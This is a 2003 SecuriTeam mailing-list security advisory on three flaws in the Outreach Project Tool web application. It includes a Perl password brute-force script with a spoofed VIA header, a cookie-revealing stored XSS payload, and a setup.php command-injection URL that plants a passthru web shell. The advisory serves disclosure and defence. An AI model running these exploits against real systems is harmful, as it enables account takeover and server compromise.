[UNIX] Outreach Project Tool Multiple Vulnerabiltiies

From: support@securiteam.com
Date: 01/18/03

  • Next message: support@securiteam.com: "[NT] Directory Traversal Vulnerabilities Found in NITE FTP Server" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 18 Jan 2003 10:21:19 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Outreach Project Tool Multiple Vulnerabiltiies
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.lanifex.com/business/business_en/products/815.html> The
    Outreach Project Tool was developed by CSO Lanifex GmbH to support
    communication with customers during project implementation. It has rapidly
    evolved into a highly effective Web-based collaboration system, which
    improves interaction between consultants and their clients, as well as a
    wide range of other applications.

    The product has been found to contain three security vulnerabilities.

    DETAILS

    1) Request - Header Tarpit
    The function "OPT_remote_IP()"(/opt/general.php) accepts "X_FORWARDED_FOR"
    and "VIA"- environment variables.

    This is done to identify possible proxy-servers. Unfortunately these
    variables are part of the HTTP-request headers. The follwoing
    http-request:
    ---*---
    GET /opt/whatever HTTP/1.1
    Host: whatever
    VIA: 1.2.3.4
    ---*---

    "$HTTP_VIA" will be given the user's IP.

    Thus leading to:
     - Anonymous use of the application
     - Brute-force attack against user accounts

    Exploit:
    Simple example for a brute-force attack against OPT:
    #!/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Request::Common;
    use HTTP::Response;
    my ($url,$uid,$pf) = @ARGV;
    open(P,"< $pf") || die "passf.?\n";
    my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); #
    carefully !
    while(<P>){ my $pwd = $_; chomp($pwd);
    my %h = ( VIA =>
    (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
    my $res = $ua->request(HEAD
    "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
    my $hds = $res->headers; my $new = $hds->header("Location");
    my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET
    "$new",%h); # strange db-redirect stuff ?!!
    my $cod = $res2->code;
    my $pag = $res2->content;
    print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is
    invalid/ig)?"\tYES":'')."\n"; }
    close (P);

    2) Several XSS Vulnerabilities
    Typical XSS vulnerabilities exist in many/most of the community-functions.

    Example:
    Once logged in ... go to "Notes -> News -> Ad News". Then create a News
    item with the following scripting tag:
    hello i am a news thing .. < script> alert(document.cookie); </script>

    Every user will now get now an alert window with his session-id. This
    vulnerability makes it possible once logged in to steal "any" other users
    accounts (administrator included).

    3) Setup issues (/opt/setup)
    If the lockfile "lock01" is found in the setup_lock-directory and it is
    not removed or someone is able/allowed to create a file "lock01", then the
    following is possible:

    A) Create a new environment setup
    B) Execute system-commands thru the setup.php - script.

    The second option is due to the fact that the "temp_CRM_dir" parameter is
    passed directly to the PHP-exec function.

    Exploit:
    http://localhost/opt/setup/setup.php
    ?CRM_email=opti@localhost
    &CRM_system_email=mei@localhost
    &CRM_path=/disk2/apps/opt/OPT_0.946b/opt
    &CRM_db_host=localhost&CRM_db_uname=opt
    &CRM_db_pwd=opt
    &CRM_db_db=opt
    &CRM_may_demo=0
    &temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php;
    &CRM_mail_fname=OPT_incoming_mail
    &action=Set up my OPT server

    The above exploit will create a script called "bad.php" with the following
    content <?passthru($c)?> in the OPT-setup directory.

    Recommended Hotfixes:
    After installation verify that the file "lock01" exists in
    setup_lock-directory. If it exists remove it.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:martin@websec.org> Martin
    Eiszner.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages